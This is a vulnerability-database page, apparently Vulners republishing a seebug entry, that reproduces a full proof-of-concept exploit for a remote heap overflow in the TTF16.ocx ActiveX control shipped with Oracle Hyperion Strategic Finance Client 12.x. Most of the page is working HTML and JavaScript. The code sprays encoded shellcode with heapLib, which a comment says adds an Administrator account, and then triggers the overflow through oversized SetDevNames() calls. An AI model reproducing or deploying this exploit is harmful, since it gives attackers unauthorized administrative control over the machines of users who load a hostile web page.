Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Oracle Hyperion Strategic Finance 12.x Tidestone Formula One WorkBook OLE Control TTF16.ocx Remote Heap Overflow

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 41 Views

Oracle Hyperion Strategic Finance Client 12.x Tidestone Formula One WorkBook OLE Control TTF16.ocx Remote Heap Overflow poc 99% stable,IE-no-dep. SetDevNames() vulnerabilit

Code

                                                <!-- 
Oracle Hyperion Strategic Finance Client 12.x Tidestone Formula One 
WorkBook OLE Control TTF16 (6.3.5 Build 1) SetDevNames() Remote Heap Overflow poc
99% stable,IE-no-dep. I think this control can be carried by other products, 
however 6.1 seems not vulnerable
A copy of heapLib can be found here: http://retrogod.altervista.org/heapLib_js.html
ActiveX Settings:
Binary path: C:\WINDOWS\system32\TTF16.ocx
CLSID: {B0475003-7740-11D1-BDC3-0020AF9F8E6E}
ProgID: TTF161.TTF1.6
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True

Andrea Micalizzi aka rgod
--!>
<!-- saved from url=(0014)about:internet --> 
<html>
<head>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<SCRIPT src="heapLib.js"></SCRIPT>
</head>
<body>
<object classid='clsid:B0475003-7740-11D1-BDC3-0020AF9F8E6E' id='obj' width=640 height=480/>
</object>
<SCRIPT>
var finalsize = 1200;
var final = '';
var heap = null;
var curr = 0;
function x() {	
  heap = new heapLib.ie(0x20000);
  var heapspray = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + //add Administrator, user: sun, pass: tzu
                     "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
                     "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
                     "%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
                     "%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
                     "%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
                     "%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
                     "%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
                     "%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
                     "%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
                     "%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
                     "%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
                     "%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
                     "%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
                     "%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
                     "%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
                     "%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
                     "%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
                     "%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
                     "%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
                     "%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
                     "%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
                     "%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
                     "%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
                     "%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
                     "%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
                     "%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
                     "%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
                     "%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
                     "%u7734%u4734%u4570");   
while(heapspray.length < 0x500) heapspray += unescape("%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606");
  var heapblock = heapspray;
  while(heapblock.length < 0x40000) heapblock += heapblock;
  final = heapblock.substring(2, 0x40000 - 0x21);
  if(curr < 120) {
  	spray();
  }
}

function spray() {
  if(curr < finalsize - 1) {
    for(var i = 0; i < 120; i++) {
      heap.alloc(final);
      curr++;
    }
    }  

}
</script>
<script language='javascript' defer=defer>
x();
var x ="";
for (m=0;m<90;m++){x = x  + unescape("%u0606%u0606");}
try{
    obj.SetDevNames(x,"",""); //don't touch
    obj.SetDevNames(x,x,"");
    obj.SetDevNames(x,x,x);
}
catch(e){
}
obj.SetDevNames(x,x,"");
</script>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
oraclehyperionstrategic financetidestoneformula oneworkbookole controlttf16.ocxremote heap overflowie-no-depsetdevnames()99% stable
41